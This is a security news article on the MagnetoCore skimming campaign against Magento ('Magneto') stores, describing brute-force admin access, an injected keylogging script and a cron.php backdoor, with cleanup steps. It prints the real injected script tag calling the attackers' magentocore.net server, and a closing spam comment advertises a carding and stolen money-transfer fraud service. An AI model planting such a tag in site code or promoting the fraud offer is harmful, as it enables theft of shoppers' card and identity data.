MagnetoCore Malware has already Infected more than 7000 E-Commerce Websites

Computer Security Breach Articles
  1. Security researcher Willem de Groot discovered hacking campaign targeting e-commerce website using Magneto.
  2. The campaign has already infected 7339 e-commerce site in the last 6 months.
  3. Attackers uses a skimming malware named MagnetoCore to infect the websites.
  4. The campaign is still ongoing and has been infecting 50-60 stores per day.

Security researchers have discovered a massive hacking campaign targeting Magneto stores using payment skimming malware named MagnetoCore.

The skimming malware is capable of stealing payment card data of users who purchase on the infected sites and has already infected 7339 e-commerce site in the last 6 months.

The campaign was discovered by security researcher Willem de Groot and said that “The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit. But the real victims are eventually the customers, who have their card and identity stolen.”

Working of MagnetoCore Malware

The malware attempts to gain access to the control panel of an e-commerce site using a brute force technique.

Once the access is gained, they inject a malicious piece of script into the HTML template. The script is designed to record all the keystrokes from the customers and sends to magentocore.net server registered in Moscow.

<script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>

The data extracted includes usernames, password, payment card data and other personal details.

The malware also includes a recovery mechanism. Here in the case of Magneto software, it adds a backdoor to cron.php which will download the malicious code and delete itself after the process leaving no traces.

According to researcher campaign is still ongoing and has been infecting 50-60 stores per day.

What to do if you are infected with MagnetoCore Malware

  1. First, you need to find how attackers gained unauthorized access to your site. You can find it By analyzing backend access logs.
  2. After finding the entry point, you need to find backdoors installed in your site and unauthorized modification to your codebase.
  3. Then you need to close all unauthorized access point at once.
  4. After that remove the skimmer, backdoor, and other codes and Revert to a certified safe copy of the codebase.

For more details, you can visit the analysis published by the researcher here.

For the latest cyber threats and the latest hacking news please follow us on Facebook and Twitter.

You may be interested in reading: Google’s Titan Security Key adds Another Layer of Protection to your Accounts

 

Comments

Please rate this content

1 thought on “MagnetoCore Malware has already Infected more than 7000 E-Commerce Websites

  1. Let me share my story with you all, I was in a great debt after I lost my job, I had about $30k bank debt, and I could not pay back. So while reading a finance blog, I saw a comment about someone talking about how he got western union MTCN of $7,000 several times from deepwebservice01ATgmailDOTcom, I emailed them, and placed order for $5000, and I picked it up successfully in my name without any traces. I continued working with them until I moved to the richest neighborhood in my city. They also help with carding

Comments are closed.